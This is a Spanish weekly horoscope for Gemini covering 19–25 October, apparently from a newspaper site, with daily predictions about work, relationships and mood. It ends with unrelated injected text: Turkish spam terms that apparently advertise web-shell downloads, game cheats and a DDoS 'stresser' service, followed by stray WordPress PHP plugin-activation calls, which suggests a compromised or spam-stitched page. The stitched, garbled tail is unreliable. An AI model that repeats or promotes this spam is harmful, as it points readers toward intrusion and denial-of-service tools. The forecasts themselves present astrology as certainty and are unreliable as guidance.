amor, dinero y trabajo del 19 al 25 de octubre



Géminis (nacidos entre el 22 de mayo y el 21 de junio):El 19, lunes, notarás más introspección que otros días. Necesitas pensar todas las cosas dos veces antes de actuar. Tendrás ideas que serán muy interesantes para plasmarlas en tus ocupaciones. Deberás tener cuidado en tu trato con los demás, porque así evitarás la brusquedad en tus formas de expresarte. El martes 20, tendrás ganas de indagar en las profundidades de la vida y de tu ser interior, para sacar claves que te ayuden a sentir mayor seguridad de estar en el camino correcto. Tu gran imaginación te ayudará si meditas de una manera tranquila y sacando conclusiones útiles para tu vida. Además esto cambiara tu entorno por completo, al transformarte tú.

El miércoles 21, necesitas un plan de choque y en todo lo que realizas de cara al público. Ya que estás en un momento de expansión. Y la misma será lenta, pero segura. Así que aprovecha todo lo que puedas esta buena racha, ya que estas en un día afortunado y muy lleno de ideas novedosas y originales. Sacarás todo tu ingenio y lo plasmarás en tus proyectos. El jueves 22, será un día ideal para ocuparte de asuntos del pasado o de temas inacabados para solventarlos de una vez por todas; porque de otra manera los llevarás colgando todo el tiempo y eso desgasta mucho. Así que prepara un plan para poder zanjar todo de una manera fácil y lograrás que tu tranquilidad sea mayor.

El viernes 23, hoy tendrás que fijarte mucho en la forma en la que te muestras. Ya que de ello depende que reconozcan los demás tu valía. Eso significa que estarás muy a la vista de todos. Y lo bueno, es que si aciertas, será maravilloso sentir el calor de los demás y su cariño. También es tiempo de que valores a los demás, tal y como son. El sábado 24, sentirás que tus metas están en auge, Y para ello tendrás la ayuda de las mujeres, especialmente. Ya que sus ideas son más afines con la tuyas y es más fácil que os pongáis de acuerdo en las distintas medidas que tomaréis para todos esos nuevos proyectos que son importantes y que os ayudarán tanto. Así que “Manos a la obra”.

El domingo día 25, Podrás utilizar todos los conocimientos que has adquirido tanto en los viajes a lo largo del mundo como en tus estudios que has adquirido en la vida. Notarás que son una base muy estable sobre la que apoyarte. Aparte de la experiencia que te ha ido dando la vida y todo lo que ha ido sucediendo en los distintos momentos.

Hasta aquí el horóscopo semanal de Géminis. ¿Te gustaría saber cómo le irá en el trabajo a algún familiar? ¿Quieres saber si algún amigo debería realizarse algún chequeo, o si es una semana propicia para que ‘esa’ persona encuentre el amor? EL ESPAÑOL te ofrece el resto de horóscopos de esta semana ampliados para que conozcas lo que deparan los astros.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );